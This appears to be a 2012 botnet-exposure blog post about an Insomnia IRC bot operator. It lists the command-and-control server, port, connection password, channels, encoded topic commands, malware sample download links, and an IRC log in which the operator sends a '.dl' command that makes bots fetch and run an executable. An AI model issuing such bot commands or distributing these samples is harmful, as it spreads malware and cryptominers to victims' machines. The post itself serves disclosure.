we.be.thu.gs(Insomnia bot hosted in Netherland Amsterdam Ecatel Ltd)

A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server u can read in comments for more

Resolved : [we.be.thu.gs] To [80.82.79.21]

Bv1’s insomnia bot server
Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate
Port 443
Password fuckyou
To conect do this /server we.be.thu.gs:+443
channels :
#US
#CA
#RU
#BR
#b8896 306039

Local users: Current Local Users: 1732 Max: 2638
Global users: Current Global Users: 1741 Max: 2647

Now talking in #b8896
Topic On: [ #b8896 ] [ !acdaefc6865a0e54646f63ba8b894c5a383235a46b67 ]
Topic By: [ b ]
Modes On: [ #b8896 12] [ +smntrSMuNTk 306039 12]

More about the hecker:

[z] (ghfghgf@b.uni.net): b
* [z] ~#b8896
* [z] HTTP.1.1 :HTTP 1.1
* [z] is using a Secure Connection
* [z] idle 00:11:36, signon: Tue Apr 10 10:06:54
* [z] End of WHOIS list.

Here are the samples
http://www.mediafire.com/?27a0thq2pzu9kp0 Password:virus

UPDATE:
new domains used from same guy
irc.bv1.co wich resolves to 68.178.232.99 or United States Scottsdale Godaddy.com Inc
bv1.biz wich relosves to 176.31.32.148 or France Paris Ovh Systems

irc.bv1.us wich is ianctive for the moment

Channel:
#BV1

here the pastebin log from our anonymous friend

* Topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
* Topic for #BV1 set by BV1 at Thu Apr 19 06:40:09 2012
* [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
* [BorBot] @#BV1 
* [BorBot] HTTP.1.1 :HTTP 1.1
* [BorBot] is using a Secure Connection
* [BorBot] idle 11:49:41, signon: Tue Apr 24 10:05:08
* [BorBot] End of WHOIS list.
* [BV1] (glmbrs@BV1): ...
* [BV1] ~#BV1 ~#US 
* [BV1] HTTP.1.1 :HTTP 1.1
* [BV1] is a Network Administrator
* [BV1] is available for help.
* [BV1] is using a Secure Connection
* [BV1] idle 00:18:28, signon: Tue Apr 24 00:14:38
* [BV1] End of WHOIS list.


Topic for #us is: d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA==

* Topic for #us set by Bv1 at Thu Mar 29 04:15:44 2012

we.be.thu.gs redirected to local server, and topics placed on correct channels.
On join of #BV1, bot visited http://terror-squad.co/topic.txt
Further encrypted topic in file: d3F6Q29zTzV3N3pDck1Pa3c3akR1TU84d3JiQ284S2p3N3ZEdThPN3dxTER1TU9wdzc3RHZzT2p3NzdDb2NPL3c3M0R1Y090dzZqQ29zT3Z3NlBDbzhPcXc2WERvTU9wd3I3Q29zT3B3N1REcWNLc3dyN0N0Y09xd3JuQ3VzSzF3NjNEcU1LOHdyN0N1OE91d3JUQ3Y4Syt3NnJEcjhPdnc2L0N2Y0svd3I3RHFjT3B3cnJDdXNPdHc2N0N1c0s3dzY3RHFNT3d3cXpDb3NPNXc3L0Ryc0tzdzZQRG9zT3d3cXpDb3NPL3c2UER2c080dzdEQ3JNS2l3NnJEdU1POHc3QT18OTk4NjMxNDA=

Bot then downloaded http://terror-squad.co/file2.exe, and joined #US, which was the country code received from the api.

<n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
<n{US|XP-32a}kjibmbk> Bot file is already up to date: 29F569AD027B832FCCC132EE66AB67BD == 29F569AD027B832FCCC132EE66AB67BD

New action, as I write this up.
<BV1> .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
That's a bot that attempts to download a bitcoin miner.
http://malwr.com/analysis/c38456aa1b1f93fa9da88cb3653a6fd5/
From http://api.cld.me/FoX8/download/bitcoin-miner.exe
Too bad it's not there anymore.

Samples are hosted here:
http://terror-squad.co/ wich resolves to 80.82.64.71 and still ecatel
http://80.82.64.71/~terrorsq/

Credits for this goes to the anonymous guy from here http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html

hosting infos:
http://whois.domaintools.com/80.82.79.21